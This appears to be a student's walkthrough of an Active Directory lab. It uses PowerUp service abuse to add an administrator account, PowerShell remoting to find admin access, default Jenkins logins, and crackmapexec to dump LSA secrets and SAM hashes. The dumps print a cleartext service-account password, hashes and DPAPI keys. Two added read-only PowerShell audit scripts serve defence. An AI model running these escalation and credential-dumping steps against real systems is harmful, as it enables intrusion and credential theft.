Learning Objective - 5

5. Service abused on the student VM for local privilege escalation

PS C:\AD\Tools> Import-Module .\PowerUp.ps1
PS C:\AD\Tools> Get-ServiceUnquoted -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users;
                 Permissions=AppendData/AddSubdirectory}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True

VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer
ServiceName    : AbyssWebServer
Path           : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiablePath : @{ModifiablePath=C:\WebServer; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'AbyssWebServer' -Path <HijackPath>
CanRestart     : True

PS C:\AD\Tools> Get-ModifiableServiceFile -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName                     : AbyssWebServer
Path                            : C:\WebServer\Abyss Web Server\abyssws.exe -service
ModifiableFile                  : C:\WebServer\Abyss Web Server
ModifiableFilePermissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : Everyone
StartName                       : LocalSystem
AbuseFunction                   : Install-ServiceBinary -Name 'AbyssWebServer'
CanRestart                      : True

PS C:\AD\Tools> Get-ModifiableService -Verbose
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer
VERBOSE: Current user has 'ChangeConfig' for AbyssWebServer
VERBOSE: Add-ServiceDacl IndividualService : AbyssWebServer


ServiceName   : AbyssWebServer
Path          : C:\WebServer\Abyss Web Server\abyssws.exe -service
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'AbyssWebServer'
CanRestart    : True

Answer:

AbyssWebServer

Exploitation

[*] Checking service permissions...


ServiceName   : SNMPTRAP
Path          : C:\Windows\System32\snmptrap.exe
StartName     : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -Name 'SNMPTRAP'
CanRestart    : True
PS C:\AD\Tools> Invoke-ServiceAbuse -Name 'SNMPTRAP'
WARNING: Waiting for service 'SNMP Trap (SNMPTRAP)' to stop...

ServiceAbused Command
------------- -------
SNMPTRAP      net user john Password123! /add && net localgroup Administrators john /add


PS C:\AD\Tools> net users

User accounts for \\DCORP-STD723

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
john                     WDAGUtilityAccount
The command completed successfully.

We start a cmd as administrator.

Then we add our user as a local administrator.

C:\Windows\system32>net localgroup Administrators dcorp\student723 /add
The command completed successfully.


C:\Windows\system32>net localgroup Administrators
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
dcorp\Domain Admins
dcorp\student723
john
The command completed successfully.
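The three PowerUp findings above (an unquoted service path containing spaces, a service directory writable by BUILTIN\Users and Everyone, and a service whose configuration the current user may change) are exactly what a defender should be auditing for on student and server builds. The following PowerShell script is an added example, not code from the original notes or from PowerUp: run as a local administrator, it is read-only and lists every service whose binary path is unquoted and contains spaces, then checks each directory Windows would search for that path, plus the binary's own directory, for write-type ACEs granted to low-privilege principals. The principal list and the rights mask treated as "write" are my assumptions; adjust them to the local build standard.

```powershell
# Added example (not from the original lab notes or PowerUp): audit services for
# unquoted paths and for directories writable by low-privilege groups.
# Run as a local administrator; the script only reads ACLs and changes nothing.

# Assumption: these principals count as "low privilege" for this audit.
$LowPrivPrincipals = @('BUILTIN\Users', 'Everyone',
                       'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Assumption: any of these rights on a directory lets a user drop or replace a binary in it.
# FullControl is deliberately not in the mask: it contains every bit, so it would also match
# read-only ACEs; a FullControl ACE still matches because it includes the bits below.
$WriteRights = [System.Security.AccessControl.FileSystemRights]::WriteData -bor
               [System.Security.AccessControl.FileSystemRights]::AppendData -bor
               [System.Security.AccessControl.FileSystemRights]::Delete -bor
               [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
               [System.Security.AccessControl.FileSystemRights]::TakeOwnership

# Returns "principal: rights" strings for Allow ACEs on $Path held by low-privilege principals.
function Get-LowPrivWriteAccess {
    param([string]$Path)
    if ([string]::IsNullOrWhiteSpace($Path) -or -not (Test-Path -LiteralPath $Path)) { return @() }
    $acl = Get-Acl -LiteralPath $Path
    $acl.Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       $LowPrivPrincipals -contains $_.IdentityReference.Value -and
                       (([int]$_.FileSystemRights -band [int]$WriteRights) -ne 0) } |
        ForEach-Object { "$($_.IdentityReference): $($_.FileSystemRights)" }
}

# Extracts the executable from a service's PathName, for quoted and unquoted forms.
function Get-ServiceExecutable {
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(.+?\.exe)') { return $Matches[1] }   # unquoted: up to the first .exe
    return ($PathName -split ' ')[0]
}

# For an unquoted path with spaces, e.g. C:\WebServer\Abyss Web Server\abyssws.exe, Windows
# tries C:\WebServer\Abyss.exe and C:\WebServer\Abyss Web.exe first. The directories that
# matter are therefore the prefixes before every component that contains a space.
function Get-UnquotedPathSearchDirs {
    param([string]$Exe)
    $dirs = New-Object System.Collections.Generic.List[string]
    $parts = $Exe -split '\\'
    for ($i = 1; $i -lt $parts.Count; $i++) {
        if ($parts[$i] -match ' ') {
            $prefix = ($parts[0..($i - 1)] -join '\')
            if ($prefix -match '^[A-Za-z]:$') { $prefix += '\' }   # bare drive letter -> drive root
            $dirs.Add($prefix)
        }
    }
    return $dirs | Select-Object -Unique
}

function Invoke-ServicePathAudit {
    foreach ($svc in Get-CimInstance Win32_Service) {
        if (-not $svc.PathName) { continue }
        $exe = Get-ServiceExecutable $svc.PathName
        $unquoted = ($svc.PathName -notmatch '^"') -and ($exe -match ' ')

        # Always check the binary's own directory; add the search prefixes when the path is unquoted.
        $dirsToCheck = @([System.IO.Path]::GetDirectoryName($exe))
        if ($unquoted) { $dirsToCheck += Get-UnquotedPathSearchDirs $exe }

        foreach ($dir in ($dirsToCheck | Select-Object -Unique)) {
            $weak = @(Get-LowPrivWriteAccess $dir)
            if ($weak.Count -gt 0) {
                [pscustomobject]@{
                    Service      = $svc.Name
                    RunsAs       = $svc.StartName
                    UnquotedPath = $unquoted
                    WritableDir  = $dir
                    WeakACEs     = ($weak -join '; ')
                }
            }
        }
    }
}

Invoke-ServicePathAudit | Format-Table -AutoSize
```

On a host configured like the one in the notes, the output would carry two rows for AbyssWebServer: one for C:\WebServer (BUILTIN\Users with AppendData) and one for C:\WebServer\Abyss Web Server (Everyone with write rights), both with RunsAs = LocalSystem. The fix on the defender's side is to quote the ImagePath and restrict write access on those directories to Administrators and SYSTEM; the script does not check the service object's own DACL (the ChangeConfig right that Get-ModifiableService reported), which is a separate review of the service security descriptor.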

Script used to look for local administrator privileges using PowerShell Remoting

First attempt

PS C:\AD\Tools> Find-LocalAdminAccess -Verbose
VERBOSE: [Find-LocalAdminAccess] Querying computers in the domain
VERBOSE: [Get-DomainSearcher] search base:
LDAP://DCORP-DC.DOLLARCORP.MONEYCORP.LOCAL/DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
VERBOSE: [Invoke-LDAPQuery] filter string: (&(samAccountType=805306369))
VERBOSE: [Get-DomainComputer] Error disposing of the Results object: Method invocation failed because
[System.DirectoryServices.SearchResult] does not contain a method named 'dispose'.
VERBOSE: [Find-LocalAdminAccess] TargetComputers length: 28
VERBOSE: [Find-LocalAdminAccess] Using threading with threads: 20
VERBOSE: [New-ThreadedFunction] Total number of hosts: 28
VERBOSE: [New-ThreadedFunction] Total number of threads/partitions: 20
VERBOSE: [New-ThreadedFunction] Threads executing
VERBOSE: [New-ThreadedFunction] Waiting 100 seconds for final cleanup...
VERBOSE: [New-ThreadedFunction] all threads completed

Failed.

Second attempt:

PS C:\AD\Tools> Get-NetComputer | select samaccountname

samaccountname
--------------
DCORP-DC$
DCORP-ADMINSRV$
DCORP-APPSRV$
DCORP-CI$
DCORP-MGMT$
DCORP-MSSQL$
DCORP-SQL1$
DCORP-STDADMIN$
DCORP-STD721$
DCORP-STD722$
DCORP-STD724$
DCORP-STD723$
DCORP-STD726$
DCORP-STD729$
DCORP-STD725$
DCORP-STD728$
DCORP-STD727$
DCORP-STD731$
DCORP-STD732$
DCORP-STD730$
DCORP-STD733$
DCORP-STD735$
DCORP-STD734$
DCORP-STD736$
DCORP-STD737$
DCORP-STD739$
DCORP-STD740$
DCORP-STD738$
PS C:\AD\Tools> .\Find-WMILocalAdminAccess.ps1 -ComputerFile .\computers.txt

Failed.

Third attempt:

PS C:\AD\Tools> . .\Find-PSRemotingLocalAdminAccess.ps1
PS C:\AD\Tools> Find-PSRemotingLocalAdminAccess
dcorp-std723
dcorp-adminsrv

PS C:\AD\Tools> nslookup dcorp-adminsrv
Server:  UnKnown
Address:  172.16.2.1

Name:    dcorp-adminsrv.dollarcorp.moneycorp.local
Address:  172.16.4.101
PS C:\AD\Tools> Enter-PSSession -ComputerName dcorp-adminsrv -Credential dcorp\student723
[dcorp-adminsrv]: PS C:\Users\student723\Documents> whoami
dcorp\student723
[dcorp-adminsrv]: PS C:\Users\student723\Documents> ls
[dcorp-adminsrv]: PS C:\Users\student723\Documents> cd ..
[dcorp-adminsrv]: PS C:\Users\student723> cd /
[dcorp-adminsrv]: PS C:\> ls


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/8/2021   1:15 AM                PerfLogs
d-r---        11/11/2022  12:55 AM                Program Files
d-----          5/8/2021   2:34 AM                Program Files (x86)
d-----         12/3/2023   6:36 AM                Transcripts
d-r---         2/20/2024   4:42 PM                Users
d-----         1/10/2024   1:05 AM                Windows

Jenkins user used to access Jenkins web console

http://172.16.3.11:8080/

manager:manager
builduser:builduser

Link: http://172.16.3.11:8080/job/Project0/configure

Then we get the result:

Answer:

builduser

Domain user used for running Jenkins service on dcorp-ci

Answer:

dcorp\ciadmin

Plus

crackmapexec smb 172.16.3.11 -u student723 -p hT3qDFRHGzVpJtym --lsa
SMB         172.16.3.11     445    DCORP-CI         [*] Windows 10.0 Build 20348 x64 (name:DCORP-CI) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.3.11     445    DCORP-CI         [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!)
SMB         172.16.3.11     445    DCORP-CI         [+] Dumping LSA secrets
SMB         172.16.3.11     445    DCORP-CI         DOLLARCORP.MONEYCORP.LOCAL/ciadmin:$DCC2$10240#ciadmin#3999881514643dbc5cd4efcdce983215
SMB         172.16.3.11     445    DCORP-CI         DOLLARCORP.MONEYCORP.LOCAL/student723:$DCC2$10240#student723#eb5f214b28ad3157316b015e0ceb0dde
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aes256-cts-hmac-sha1-96:8ec0804e2ed229f58336a750f8627490d3cdcb523de3031acfe4db47fb035073
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aes128-cts-hmac-sha1-96:00527bdd009fedf4f9e116f7270fd8be
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:des-cbc-md5:d08a1a1fabdfc789
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:plain_password_hex:360056003d002b004c002600470051004e0055003b00220061007500280056004f00390025006a0071003c005f005e003d004600600033004a0071004d0043002200500021005100300068006f005b00490071005b002800430075006d005d007200530025006a004b004b00280023002d005d0064002d006800720049003c006e0042003600760056006f00220044004c00670045007700450059003a002a006300600051003e00600033003e005200430075006e002f0033005e0024007200630034004e002800650045006b0022002400570045007400770071005a0068005b00380026002f004b0048005c007400
SMB         172.16.3.11     445    DCORP-CI         dcorp\DCORP-CI$:aad3b435b51404eeaad3b435b51404ee:f76f48c176dc09cfd5765843c32809f3:::
SMB         172.16.3.11     445    DCORP-CI         dpapi_machinekey:0x4796c1a459d09e880ee84dc5958f1cdca366c808
dpapi_userkey:0xeba6b8fb6245f03382bff91e8fb6fd323080b80c
SMB         172.16.3.11     445    DCORP-CI         NL$KM:09c87bc296416ecbb2f61bdc295c39767ea62297dcd3be6bc3714871616bb2b3d0d6e048f08b7d8b8b149505b421fe93285147f12624b5f4e420b6ace5903302
SMB         172.16.3.11     445    DCORP-CI         dcorp\ciadmin:*ContinuousIntrusion123
SMB         172.16.3.11     445    DCORP-CI         [+] Dumped 10 LSA secrets to /home/dsds/.cme/logs/DCORP-CI_172.16.3.11_2024-02-20_212833.secrets and /home/dsds/.cme/logs/DCORP-CI_172.16.3.11_2024-02-20_212833.cached
crackmapexec smb 172.16.3.11 -u student723 -p hT3qDFRHGzVpJtym --sam
SMB         172.16.3.11     445    DCORP-CI         [*] Windows 10.0 Build 20348 x64 (name:DCORP-CI) (domain:dollarcorp.moneycorp.local) (signing:False) (SMBv1:False)
SMB         172.16.3.11     445    DCORP-CI         [+] dollarcorp.moneycorp.local\student723:hT3qDFRHGzVpJtym (Pwn3d!)
SMB         172.16.3.11     445    DCORP-CI         [+] Dumping SAM hashes
SMB         172.16.3.11     445    DCORP-CI         Administrator:500:aad3b435b51404eeaad3b435b51404ee:deaa870c264c682aa1fbfc31ebe678a2:::
SMB         172.16.3.11     445    DCORP-CI         Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         172.16.3.11     445    DCORP-CI         [+] Added 4 SAM hashes to the database
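The --lsa dump above recovers the Jenkins service account's password (dcorp\ciadmin) in clear text because Windows has to store the logon password of any service that runs as a real user account, local or domain, as an LSA secret on that host, where any local administrator can read it. The following PowerShell script is an added example, not code from the notes or from CrackMapExec: it inventories services on a host that run under such accounts, so a defender can find domain users like ciadmin that should be replaced by a group Managed Service Account or a virtual account. The built-in account list is my assumption; the IsManaged column only checks the trailing '$' that MSA and gMSA names carry.

```powershell
# Added example (not from the original lab notes or CrackMapExec): list services whose logon
# account is a real user, i.e. whose password is stored as an LSA secret on this host.
# Run as a local administrator; read-only.

# Assumption: these built-in accounts have no stored password worth recovering.
$BuiltinAccounts = @('LocalSystem', 'NT AUTHORITY\LocalService', 'NT AUTHORITY\NetworkService')

function Get-ServiceLogonAccount {
    param([string]$ComputerName = $env:COMPUTERNAME)
    Get-CimInstance Win32_Service -ComputerName $ComputerName |
        Where-Object {
            $_.StartName -and
            ($BuiltinAccounts -notcontains $_.StartName) -and
            ($_.StartName -notlike 'NT SERVICE\*')            # per-service virtual accounts
        } |
        ForEach-Object {
            $name = $_.StartName
            # ".\user" and "HOST\user" are SAM accounts on this host; anything else is a domain
            # account, whose LSA-stored password also gives access elsewhere in the domain.
            $scope = if ($name -like '.\*' -or $name -like "$ComputerName\*") { 'Local' } else { 'Domain' }
            [pscustomobject]@{
                Computer  = $ComputerName
                Service   = $_.Name
                StartName = $name
                Scope     = $scope
                # MSA/gMSA names end in '$'; their passwords rotate automatically, unlike the
                # static password of a user account such as ciadmin.
                IsManaged = ($name.TrimEnd() -match '\$$')
                State     = $_.State
            }
        }
}

# Domain user accounts with static passwords are the rows to act on first.
Get-ServiceLogonAccount |
    Sort-Object Scope, IsManaged |
    Format-Table -AutoSize
```

On dcorp-ci this would list the Jenkins service with StartName dcorp\ciadmin, Scope = Domain and IsManaged = False, which is the configuration the dump exploits. Running the function against every server in the domain (pass -ComputerName in a loop over the computer list) gives the set of hosts where a single local administrator compromise also yields a domain credential.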
